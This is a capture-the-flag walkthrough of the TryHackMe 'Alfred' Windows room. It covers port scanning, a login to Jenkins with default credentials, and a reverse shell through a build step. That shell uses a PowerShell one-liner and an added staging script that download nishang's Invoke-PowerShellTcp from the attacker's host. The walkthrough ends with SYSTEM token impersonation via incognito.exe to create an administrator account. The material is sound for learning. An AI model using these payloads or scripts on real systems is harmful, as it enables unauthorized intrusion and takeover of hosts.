#tryhackme #windows #easy
![[Pasted image 20250710202706.png]]
---
# Information Gathering - Nmap
As always, I began with an nmap SYN scan of all 65535 TCP ports. `--open` shows only open ports, `-Pn` skips host discovery so a host that ignores ping is still scanned, and `--min-rate 3000` keeps the full-range scan under a minute.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:41 CDT
Nmap scan report for 10.10.212.94
Host is up (0.14s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
```
Then I ran a script and version scan (`-sCV`) against the three ports found: 80, 3389, and 8080. This run reported all three as `filtered`, so no banners or versions came back. That contradicts the SYN scan and is most likely the VPN dropping (the same problem described later in this writeup); a targeted scan that comes back all-filtered should be re-run once connectivity is stable rather than trusted.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV -Pn $IP -p 80,3389,8080
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT
Nmap scan report for 10.10.212.94
Host is up.
PORT STATE SERVICE VERSION
80/tcp filtered http
3389/tcp filtered ms-wbt-server
8080/tcp filtered http-proxy
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
```
Lastly, a UDP scan of the top 10 ports. Every port came back `open|filtered`, which means nmap got no reply at all (an open UDP service and a filtered port look identical without an application-layer probe), so UDP gave us nothing to work with.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT
Nmap scan report for 10.10.212.94
Host is up.
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
```
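The two-stage scan above (full SYN sweep, then `-sCV` on only the open ports) is worth scripting, and it is also where the writeup's own results disagree with each other: the targeted scan reported `filtered` for ports the first scan found `open`. The script below is an added example, not part of the original writeup: it parses nmap's grepable (`-oG`) output, builds the `-p` list for the second scan, and flags any port whose state changed between runs. The two `SAMPLE_*` strings are constructed to mirror the scans above and are not real captured output; `scan_target` runs the real commands only when you pass a target IP.

```shell
#!/bin/sh
# Two-stage nmap workflow with a consistency check between stages (added example).
# The sample grepable output below is constructed to mirror the scans in this writeup.

# Constructed -oG output for the full TCP scan: three open ports.
SAMPLE_FULL=$(printf 'Host: 10.10.212.94 ()\tStatus: Up\nHost: 10.10.212.94 ()\tPorts: 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///, 8080/open/tcp//http-proxy///\tIgnored State: filtered (65532)\n')

# Constructed -oG output for the targeted -sCV scan taken while connectivity had dropped.
SAMPLE_TARGETED=$(printf 'Host: 10.10.212.94 ()\tStatus: Up\nHost: 10.10.212.94 ()\tPorts: 80/filtered/tcp//http///, 3389/filtered/tcp//ms-wbt-server///, 8080/filtered/tcp//http-proxy///\n')

# Turn the "Ports:" field of a grepable scan into one "port/state/proto/..." entry per line.
port_entries() {   # $1 = grepable file
  grep '^Host:.*Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State:.*//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//'
}

# Comma-separated list of ports in state "open", ready to hand to "nmap -p".
open_ports_from_grepable() {   # $1 = grepable file
  port_entries "$1" | awk -F/ '$2 == "open" { print $1 }' | sort -n | uniq | paste -s -d, -
}

# State nmap recorded for a single port ("absent" if the port is not listed at all).
port_state() {   # $1 = grepable file, $2 = port number
  port_entries "$1" \
    | awk -F/ -v port="$2" '$1 == port { print $2; found = 1 } END { if (!found) print "absent" }'
}

# Ports that were open in the first scan but are not open in the second, as "port:state".
flipped_ports() {   # $1 = first grepable file, $2 = second grepable file
  for p in $(open_ports_from_grepable "$1" | tr ',' '\n'); do
    state=$(port_state "$2" "$p")
    [ "$state" = "open" ] || echo "$p:$state"
  done | paste -s -d, -
}

# Apply the check to the constructed samples; reproduces the contradiction seen above.
demo_flip_check() {
  dir=$(mktemp -d)
  printf '%s\n' "$SAMPLE_FULL" > "$dir/full.gnmap"
  printf '%s\n' "$SAMPLE_TARGETED" > "$dir/targeted.gnmap"
  flipped_ports "$dir/full.gnmap" "$dir/targeted.gnmap"
  rm -rf "$dir"
}

# Live workflow: full SYN scan, then -sCV on only the open ports, then warn if the second
# scan contradicts the first (typically a VPN drop or rate limiting, not a closed service).
scan_target() {   # $1 = target IP; writes full.gnmap and targeted.gnmap in the current directory
  sudo nmap -sS -Pn --open --min-rate 3000 -p- -oG full.gnmap "$1" >/dev/null || return 1
  ports=$(open_ports_from_grepable full.gnmap)
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $1" >&2
    return 1
  fi
  nmap -sCV -Pn -p "$ports" -oG targeted.gnmap "$1"
  flipped=$(flipped_ports full.gnmap targeted.gnmap)
  if [ -n "$flipped" ]; then
    echo "WARNING: open in the full scan but not in the targeted scan: $flipped" >&2
    echo "WARNING: check VPN connectivity and re-run the targeted scan" >&2
  fi
}

# Scan a real target only when an IP is given, e.g. ./scan.sh 10.10.212.94
[ $# -eq 0 ] || scan_target "$1"
```

Run without arguments the script only defines functions; `demo_flip_check` prints `80:filtered,3389:filtered,8080:filtered` for the constructed samples, which is exactly the situation the second scan above produced and the reason to re-run rather than conclude the services went away.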
# Footprinting
##### Port 80
This is the landing page. The page source didn't reveal anything interesting.
![[Pasted image 20250709214553.png]]
##### Port 8080
The landing page on port 8080 is a login form, and the branding makes it clear that this is Jenkins.
![[Pasted image 20250709215449.png]]
# Exploit - Initial Access
In the login form, I tried the default credentials `admin:admin` and they worked. Now let's look for a way to execute code on the underlying host.
![[Pasted image 20250709215914.png]]
Jenkins build steps run arbitrary commands on the node that executes the build, which on a single-server setup like this one is the Jenkins host itself, so anyone who can configure a job can run code on the box. To navigate there, go to `project`.
![[Pasted image 20250709234030.png]]
Now navigate to `Configure`
![[Pasted image 20250709234230.png]]
In the `Build` section, the `Execute Windows batch command` step takes Windows commands that run on the Jenkins host under the account the Jenkins service uses. For our purpose, I'm going to use the following payload to get a reverse shell:
```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
```
![[Pasted image 20250709234908.png]]
To use the payload above, I first need `nishang`'s `Invoke-PowerShellTcp.ps1` reverse shell script from [here](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1). Note that the two `<IP>:<PORT>` pairs in the payload have different roles: the first is the web server the Jenkins host downloads the script from, the second is the listener the shell connects back to, and they can be different ports.
The upper pane is the web server on my local Kali from which the Jenkins host downloads `Invoke-PowerShellTcp.ps1`. The bottom pane is the listener that receives the reverse shell connection.
![[Pasted image 20250710000041.png]]
Insert the payload, then select `Apply` and `Save` at the bottom.
![[Pasted image 20250710000236.png]]
Jenkins then redirects us to the `Project` page; select `Build Now` to run the build and, with it, our command.
![[Pasted image 20250710000342.png]]
Under `Build History` you can see the newly created build running.
![[Pasted image 20250710000622.png]]
Back in the terminal, we can see that we got the reverse shell!
![[Pasted image 20250710000650.png]]
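The steps above (get the nishang script, serve it over HTTP, start a listener, paste the one-liner into the build step, click `Build Now`) are easy to get wrong in one detail: the payload carries two address/port pairs and the listener has to be up before the build runs. The script below is an added example, not part of the original writeup, that stages everything from one `LHOST` and two ports and verifies the script is actually fetchable before printing the payload. `LHOST`, `HTTP_PORT` and `SHELL_PORT` are the attacker's own values; the raw GitHub URL is assumed to be the raw form of the link given above, and `python3`'s `http.server` plus `nc` are assumed to be installed on the Kali side.

```shell
#!/bin/sh
# Stage the Jenkins build-step reverse shell used above (added example):
# serve Invoke-PowerShellTcp.ps1 over HTTP, start the listener, print the one-liner.

SCRIPT_NAME=Invoke-PowerShellTcp.ps1
# Assumed raw-download form of the nishang link given in the writeup.
SCRIPT_URL="https://raw.githubusercontent.com/samratashok/nishang/master/Shells/$SCRIPT_NAME"

valid_port() {   # digits only, 1..65535
  case $1 in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

valid_ipv4() {   # four dotted-decimal octets, each 0..255
  old_ifs=$IFS; IFS=.
  set -- $1
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    case $o in ''|*[!0-9]*) return 1 ;; esac
    [ "$o" -le 255 ] || return 1
  done
}

# The exact one-liner from the writeup with both pairs filled in:
# first pair = HTTP server hosting the script, second pair = listener the shell calls back to.
build_payload() {   # $1 = LHOST, $2 = HTTP port, $3 = listener port
  printf "powershell iex (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');Invoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n" \
    "$1" "$2" "$SCRIPT_NAME" "$1" "$3"
}

stage() {   # $1 = LHOST, $2 = HTTP port, $3 = listener port
  valid_ipv4 "$1" || { echo "bad LHOST: $1" >&2; return 1; }
  valid_port "$2" && valid_port "$3" || { echo "bad port" >&2; return 1; }
  [ "$2" != "$3" ] || { echo "HTTP port and listener port must differ" >&2; return 1; }
  command -v nc >/dev/null || { echo "nc not found" >&2; return 1; }
  # Fetch the nishang script once if it is not already in the working directory.
  [ -f "$SCRIPT_NAME" ] || curl -sSfLo "$SCRIPT_NAME" "$SCRIPT_URL" || return 1
  python3 -m http.server "$2" --bind "$1" >/dev/null 2>&1 &
  http_pid=$!
  trap 'kill $http_pid 2>/dev/null' EXIT INT TERM
  sleep 1
  # Confirm the script is reachable before anything is pasted into Jenkins.
  curl -sfI "http://$1:$2/$SCRIPT_NAME" >/dev/null \
    || { echo "script not reachable at http://$1:$2/$SCRIPT_NAME" >&2; return 1; }
  echo "Paste this into the Jenkins build step, then click Build Now:"
  build_payload "$1" "$2" "$3"
  echo "Listening on $1:$3 ..."
  nc -lvnp "$3"
}

# Run only when invoked with arguments, e.g. ./stage.sh 10.8.0.2 8000 4444
if [ $# -gt 0 ]; then
  [ $# -eq 3 ] || { echo "usage: $0 LHOST HTTP_PORT SHELL_PORT" >&2; exit 2; }
  stage "$@"
fi
```

The HEAD request against the served file catches the two common failures (wrong webroot, `LHOST` bound to the wrong interface) before the build runs, and the `trap` tears the HTTP server down when the listener exits.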
Found the `user.txt` flag:
```powershell
PS C:\Users\bruce\Desktop> dir
Directory: C:\Users\bruce\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txt
PS C:\Users\bruce\Desktop> type user.txt
790...
```
# Privilege Escalation
`whoami /priv` lists the privileges assigned to the token of the user `bruce` and whether each one is currently enabled or disabled. `SeDebugPrivilege`, `SeChangeNotifyPrivilege`, `SeImpersonatePrivilege`, and `SeCreateGlobalPrivilege` are enabled for bruce. `SeImpersonatePrivilege` is the interesting one: it is typically granted to service accounts, and our shell came out of the Jenkins service running as `bruce`.
![[Pasted image 20250710002017.png]]
**For some reason my TryHackMe openvpn kept disconnecting to a point where I couldn't progress any further. Therefore, I am starting over with TryHackMe's built in VM. You can notice the different UI in the screenshots.**
`SeImpersonatePrivilege` lets a process impersonate the security context of another user once it holds a handle to that user's token, including privileged tokens like `NT AUTHORITY\SYSTEM`. That is why a shell as a service account holding this privilege is so often a short step from SYSTEM. I am going to use the `incognito.exe` tool to take advantage of this and escalate privileges. I am using the standalone version, not the `meterpreter` one.
I transferred `incognito.exe` from my local environment to the remote Windows system.
![[Pasted image 20250710195427.png]]
`./incognito.exe list_tokens -u` enumerates the tokens reachable from our process. Under `Delegation Tokens Available`, `NT AUTHORITY\SYSTEM` is listed, meaning there is a SYSTEM token on the box that we can impersonate, and SYSTEM is the most privileged local account on Windows. The `Not running as SYSTEM` warning only means the listing may be incomplete; the token we need is already there.
```powershell
PS C:\Temp> ./incognito.exe list_tokens -u
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found
Delegation Tokens Available
============================================
alfred\bruce
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
============================================
NT AUTHORITY\ANONYMOUS LOGON
Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeRelabelPrivilege
SeLoadDriverPrivilege
```
Remember, we found port `3389` open, running RDP. Incognito's `add_user` and `add_localgroup_user` commands perform the user creation and group change while impersonating the SYSTEM token, so even though `bruce` is not an administrator we can create a user, add it to the `Administrators` group, and connect over RDP. This is a noisy route: it leaves a persistent local account behind and generates security events 4720 (user account created) and 4732 (member added to a local group), so on a real engagement remove the account afterwards.
```powershell
PS C:\Temp> ./incognito.exe add_user wook wook413
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user wook to host 127.0.0.1
[+] Successfully added user
PS C:\Temp> ./incognito.exe add_localgroup_user Administrators wook
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user wook to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
```
With the user created and added to the Administrators group, run `xfreerdp` to connect to the server with the credentials we just created, in our case `wook:wook413`.
```bash
xfreerdp /v:10.10.41.223 /u:wook /p:wook413 /dynamic-resolution
```
`whoami` returns `alfred\wook`, and the `net localgroup` command confirms that we are a member of the `Administrators` group, as expected.
![[Pasted image 20250710201903.png]]
Found the `root.txt` flag!
![[Pasted image 20250710202638.png]]